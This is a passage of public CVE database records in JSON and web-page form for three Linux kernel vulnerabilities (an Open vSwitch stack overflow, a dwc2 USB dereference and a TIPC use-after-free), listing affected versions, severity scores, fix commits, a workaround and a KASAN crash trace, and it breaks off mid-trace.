"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "This issue was discovered by Aaron Conole (Red Hat)."
}
],
"datePublic": "2024-02-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T15:28:04.303Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:4823",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4823"
},
{
"name": "RHSA-2024:4831",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4831"
},
{
"name": "RHSA-2024:9315",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:9315"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-1151"
},
{
"name": "RHBZ#2262241",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262241"
},
{
"url": "https://lore.kernel.org/all/20240207132416.1488485-1-aconole@redhat.com/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-02-01T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-02-07T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: stack overflow problem in open vswitch kernel module leading to dos",
"workarounds": [
{
"lang": "en",
"value": "To mitigate this issue, prevent module openvswitch from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically."
}
],
"x_redhatCweChain": "CWE-121: Stack-based Buffer Overflow"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-1151",
"datePublished": "2024-02-11T14:29:48.797Z",
"dateReserved": "2024-02-01T11:25:18.149Z",
"dateUpdated": "2025-11-07T15:28:04.303Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26997 (GCVE-0-2024-26997)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: dwc2: host: Fix dereference issue in DDMA completion flow.
Fixed variable dereference issue in DDMA completion flow.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: dca1dc1e99e09e7b8eaccb55d6aecb87d9cb8ecd Version: 693bbbccd9c774adacaf03ae9fcbb33b66b1ffc4 Version: db4fa0c8e811676a7bfe8363a01e70ee601e75f7 Version: 32d3f2f108ebcaf9bd9fc06095c776cb73add034 Version: bc48eb1b53ce977d17d51caa574bd81064a117a2 Version: 8d310e5d702c903a7ac95fb5dd248f046b39db00 Version: 8b7c57ab6f6bc6bfee87e929cab6e6dac351606b Version: b258e42688501cadb1a6dd658d6f015df9f32d8f Version: c4046e703e0083c8d2031cce02f2479e9ba2c166 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26997",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:40:39.519356Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:46:29.335Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.901Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/257d313e37d66c3bcc87197fb5b8549129c45dfe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75bf5e78b2a27cb1bca6fa826e3ab685015165e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9de10b59d16880a0a3ae2876c142fe54ce45d816"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8a139fa44870e84ac228b7b76423a49610e5ba9a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/55656b2afd5f1efcec4245f3e7e814c2a9ef53f6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eed04fa96c48790c1cce73c8a248e9d460b088f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/dwc2/hcd_ddma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "257d313e37d66c3bcc87197fb5b8549129c45dfe",
"status": "affected",
"version": "dca1dc1e99e09e7b8eaccb55d6aecb87d9cb8ecd",
"versionType": "git"
},
{
"lessThan": "75bf5e78b2a27cb1bca6fa826e3ab685015165e1",
"status": "affected",
"version": "693bbbccd9c774adacaf03ae9fcbb33b66b1ffc4",
"versionType": "git"
},
{
"lessThan": "26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf",
"status": "affected",
"version": "db4fa0c8e811676a7bfe8363a01e70ee601e75f7",
"versionType": "git"
},
{
"lessThan": "8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c",
"status": "affected",
"version": "32d3f2f108ebcaf9bd9fc06095c776cb73add034",
"versionType": "git"
},
{
"lessThan": "9de10b59d16880a0a3ae2876c142fe54ce45d816",
"status": "affected",
"version": "bc48eb1b53ce977d17d51caa574bd81064a117a2",
"versionType": "git"
},
{
"lessThan": "8a139fa44870e84ac228b7b76423a49610e5ba9a",
"status": "affected",
"version": "8d310e5d702c903a7ac95fb5dd248f046b39db00",
"versionType": "git"
},
{
"lessThan": "55656b2afd5f1efcec4245f3e7e814c2a9ef53f6",
"status": "affected",
"version": "8b7c57ab6f6bc6bfee87e929cab6e6dac351606b",
"versionType": "git"
},
{
"lessThan": "eed04fa96c48790c1cce73c8a248e9d460b088f8",
"status": "affected",
"version": "b258e42688501cadb1a6dd658d6f015df9f32d8f",
"versionType": "git"
},
{
"status": "affected",
"version": "c4046e703e0083c8d2031cce02f2479e9ba2c166",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/dwc2/hcd_ddma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4.19.313",
"status": "affected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThan": "5.4.275",
"status": "affected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThan": "5.10.216",
"status": "affected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThan": "5.15.157",
"status": "affected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThan": "6.1.88",
"status": "affected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThan": "6.6.29",
"status": "affected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThan": "6.8.8",
"status": "affected",
"version": "6.8.3",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.7.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc2: host: Fix dereference issue in DDMA completion flow.\n\nFixed variable dereference issue in DDMA completion flow."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:18.367Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/257d313e37d66c3bcc87197fb5b8549129c45dfe"
},
{
"url": "https://git.kernel.org/stable/c/75bf5e78b2a27cb1bca6fa826e3ab685015165e1"
},
{
"url": "https://git.kernel.org/stable/c/26fde0ea40dda1b08fad3bc0a43f122f6dd8bddf"
},
{
"url": "https://git.kernel.org/stable/c/8aa5c28ac65cb5e7f1b9c0c3238c00b661dd2b8c"
},
{
"url": "https://git.kernel.org/stable/c/9de10b59d16880a0a3ae2876c142fe54ce45d816"
},
{
"url": "https://git.kernel.org/stable/c/8a139fa44870e84ac228b7b76423a49610e5ba9a"
},
{
"url": "https://git.kernel.org/stable/c/55656b2afd5f1efcec4245f3e7e814c2a9ef53f6"
},
{
"url": "https://git.kernel.org/stable/c/eed04fa96c48790c1cce73c8a248e9d460b088f8"
}
],
"title": "usb: dwc2: host: Fix dereference issue in DDMA completion flow.",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26997",
"datePublished": "2024-05-01T05:28:21.226Z",
"dateReserved": "2024-02-19T14:20:24.206Z",
"dateUpdated": "2025-05-04T12:55:18.367Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36886 (GCVE-0-2024-36886)
Vulnerability from cvelistv5
Published
2024-05-30 15:28
Modified
2025-05-04 09:11
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tipc: fix UAF in error path
Sam Page (sam4k) working with Trend Micro Zero Day Initiative reported
a UAF in the tipc_buf_append() error path:
BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x47e/0x4c0
linux/net/core/skbuff.c:1183
Read of size 8 at addr ffff88804d2a7c80 by task poc/8034
CPU: 1 PID: 8034 Comm: poc Not tainted 6.8.2 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.16.0-debian-1.16.0-5 04/01/2014
Call Trace:
<IRQ>
__dump_stack linux/lib/dump_stack.c:88
dump_stack_lvl+0xd9/0x1b0 linux/lib/dump_stack.c:106
print_address_description linux/mm/kasan/report.c:377
print_report+0xc4/0x620 linux/mm/kasan/report.c:488
kasan_report+0xda/0x110 linux/mm/kasan/report.c:601
kfree_skb_list_reason+0x47e/0x4c0 linux/net/core/skbuff.c:1183
skb_release_data+0x5af/0x880 linux/net/core/skbuff.c:1026
skb_release_all linux/net/core/skbuff.c:1094
__kfree_skb linux/net/core/skbuff.c:1108
kfree_skb_reason+0x12d/0x210 linux/net/core/skbuff.c:1144
kfree_skb linux/./include/linux/skbuff.h:1244
tipc_buf_append+0x425/0xb50 linux/net/tipc/msg.c:186
tipc_link_input+0x224/0x7c0 linux/net/tipc/link.c:1324
tipc_link_rcv+0x76e/0x2d70 linux/net/tipc/link.c:1824
tipc_rcv+0x45f/0x10f0 linux/net/tipc/node.c:2159
tipc_udp_recv+0x73b/0x8f0 linux/net/tipc/udp_media.c:390
udp_queue_rcv_one_skb+0xad2/0x1850 linux/net/ipv4/udp.c:2108
udp_queue_rcv_skb+0x131/0xb00 linux/net/ipv4/udp.c:2186
udp_unicast_rcv_skb+0x165/0x3b0 linux/net/ipv4/udp.c:2346
__udp4_lib_rcv+0x2594/0x3400 linux/net/ipv4/udp.c:2422
ip_protocol_deliver_rcu+0x30c/0x4e0 linux/net/ipv4/ip_input.c:205
ip_local_deliver_finish+0x2e4/0x520 linux/net/ipv4/ip_input.c:233
NF_HOOK linux/./include/linux/netfilter.h:314
NF_HOOK linux/./include/linux/netfilter.h:308
ip_local_deliver+0x18e/0x1f0 linux/net/ipv4/ip_input.c:254
dst_input linux/./include/net/dst.h:461
ip_rcv_finish linux/net/ipv4/ip_input.c:449
NF_HOOK linux/./include/linux/netfilter.h:314
NF_HOOK linux/./include/linux/netfilter.h:308
ip_rcv+0x2c5/0x5d0 linux/net/ipv4/ip_input.c:569
__netif_receive_skb_one_core+0x199/0x1e0 linux/net/core/dev.c:5534
__netif_receive_skb+0x1f/0x1c0 linux/net/core/dev.c:5648
process_backlog+0x101/0x6b0 linux/net/core/dev.c:5976
__napi_poll.constprop.0+0xba/0x550 linux/net/core/dev.c:6576
napi_poll linux/net/core/dev.c:6645
net_rx_action+0x95a/0xe90 linux/net/core/dev.c:6781
__do_softirq+0x21f/0x8e7 linux/kernel/softirq.c:553
do_softirq linux/kernel/softirq.c:454
do_softirq+0xb2/0xf0 linux/kernel/softirq.c:441
</IRQ>
<TASK>
__local_bh_enable_ip+0x100/0x120 linux/kernel/softirq.c:381
local_bh_enable linux/./include/linux/bottom_half.h:33
rcu_read_unlock_bh linux/./include/linux/rcupdate.h:851
__dev_queue_xmit+0x871/0x3ee0 linux/net/core/dev.c:4378
dev_queue_xmit linux/./include/linux/netdevice.h:3169
neigh_hh_output linux/./include/net/neighbour.h:526
neigh_output linux/./include/net/neighbour.h:540
ip_finish_output2+0x169f/0x2550 linux/net/ipv4/ip_output.c:235
__ip_finish_output linux/net/ipv4/ip_output.c:313
__ip_finish_output+0x49e/0x950 linux/net/ipv4/ip_output.c:295
ip_finish_output+0x31/0x310 linux/net/ipv4/ip_output.c:323
NF_HOOK_COND linux/./include/linux/netfilter.h:303
ip_output+0x13b/0x2a0 linux/net/ipv4/ip_output.c:433
dst_output linux/./include/net/dst.h:451
ip_local_out linux/net/ipv4/ip_output.c:129
ip_send_skb+0x3e5/0x560 linux/net/ipv4/ip_output.c:1492
udp_send_skb+0x73f/0x1530 linux/net/ipv4/udp.c:963
udp_sendmsg+0x1a36/0x2b40 linux/net/ipv4/udp.c:1250
inet_sendmsg+0x105/0x140 linux/net/ipv4/af_inet.c:850
sock_sendmsg_nosec linux/net/socket.c:730
__sock_sendmsg linux/net/socket.c:745
__sys_sendto+0x42c/0x4e0 linux/net/socket.c:2191
__do_sys_sendto linux/net/socket.c:2203
__se_sys_sendto linux/net/socket.c:2199
__x64_sys_sendto+0xe0/0x1c0 linux/net/socket.c:2199
do_syscall_x64 linux/arch/x86/entry/common.c:52
do_syscall_
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 Version: 1149557d64c97dc9adf3103347a1c0e8c06d3b89 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:4.1:-:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "4.1"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "e19ec8ab0e25",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "93bc2d6d16f2",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "367766ff9e40",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "66116556076f",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "21ea04aad8a0",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "ffd4917c1edb",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "a0fbb26f8247",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
},
{
"lessThan": "080cbb890286",
"status": "affected",
"version": "1149557d64c9",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36886",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-22T03:55:33.064938Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T12:40:50.587Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-10-18T13:07:39.609Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e19ec8ab0e25bc4803d7cc91c84e84532e2781bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93bc2d6d16f2c3178736ba6b845b30475856dc40"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/367766ff9e407f8a68409b7ce4dc4d5a72afeab1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66116556076f0b96bc1aa9844008c743c8c67684"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21ea04aad8a0839b4ec27ef1691ca480620e8e14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ffd4917c1edb3c3ff334fce3704fbe9c39f35682"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0fbb26f8247e326a320e2cb4395bfb234332c90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/080cbb890286cd794f1ee788bbc5463e2deb7c2b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241018-0002/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tipc/msg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e19ec8ab0e25bc4803d7cc91c84e84532e2781bd",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "93bc2d6d16f2c3178736ba6b845b30475856dc40",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "367766ff9e407f8a68409b7ce4dc4d5a72afeab1",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "66116556076f0b96bc1aa9844008c743c8c67684",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "21ea04aad8a0839b4ec27ef1691ca480620e8e14",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "ffd4917c1edb3c3ff334fce3704fbe9c39f35682",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "a0fbb26f8247e326a320e2cb4395bfb234332c90",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
},
{
"lessThan": "080cbb890286cd794f1ee788bbc5463e2deb7c2b",
"status": "affected",
"version": "1149557d64c97dc9adf3103347a1c0e8c06d3b89",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tipc/msg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.1"
},
{
"lessThan": "4.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "4.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntipc: fix UAF in error path\n\nSam Page (sam4k) working with Trend Micro Zero Day Initiative reported\na UAF in the tipc_buf_append() error path:\n\nBUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x47e/0x4c0\nlinux/net/core/skbuff.c:1183\nRead of size 8 at addr ffff88804d2a7c80 by task poc/8034\n\nCPU: 1 PID: 8034 Comm: poc Not tainted 6.8.2 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.16.0-debian-1.16.0-5 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n __dump_stack linux/lib/dump_stack.c:88\n dump_stack_lvl+0xd9/0x1b0 linux/lib/dump_stack.c:106\n print_address_description linux/mm/kasan/report.c:377\n print_report+0xc4/0x620 linux/mm/kasan/report.c:488\n kasan_report+0xda/0x110 linux/mm/kasan/report.c:601\n kfree_skb_list_reason+0x47e/0x4c0 linux/net/core/skbuff.c:1183\n skb_release_data+0x5af/0x880 linux/net/core/skbuff.c:1026\n skb_release_all linux/net/core/skbuff.c:1094\n __kfree_skb linux/net/core/skbuff.c:1108\n kfree_skb_reason+0x12d/0x210 linux/net/core/skbuff.c:1144\n kfree_skb linux/./include/linux/skbuff.h:1244\n tipc_buf_append+0x425/0xb50 linux/net/tipc/msg.c:186\n tipc_link_input+0x224/0x7c0 linux/net/tipc/link.c:1324\n tipc_link_rcv+0x76e/0x2d70 linux/net/tipc/link.c:1824\n tipc_rcv+0x45f/0x10f0 linux/net/tipc/node.c:2159\n tipc_udp_recv+0x73b/0x8f0 linux/net/tipc/udp_media.c:390\n udp_queue_rcv_one_skb+0xad2/0x1850 linux/net/ipv4/udp.c:2108\n udp_queue_rcv_skb+0x131/0xb00 linux/net/ipv4/udp.c:2186\n udp_unicast_rcv_skb+0x165/0x3b0 linux/net/ipv4/udp.c:2346\n __udp4_lib_rcv+0x2594/0x3400 linux/net/ipv4/udp.c:2422\n ip_protocol_deliver_rcu+0x30c/0x4e0 linux/net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x2e4/0x520 linux/net/ipv4/ip_input.c:233\n NF_HOOK linux/./include/linux/netfilter.h:314\n NF_HOOK linux/./include/linux/netfilter.h:308\n ip_local_deliver+0x18e/0x1f0 linux/net/ipv4/ip_input.c:254\n dst_input linux/./include/net/dst.h:461\n ip_rcv_finish linux/net/ipv4/ip_input.c:449\n NF_HOOK linux/./include/linux/netfilter.h:314\n NF_HOOK linux/./include/linux/netfilter.h:308\n ip_rcv+0x2c5/0x5d0 linux/net/ipv4/ip_input.c:569\n 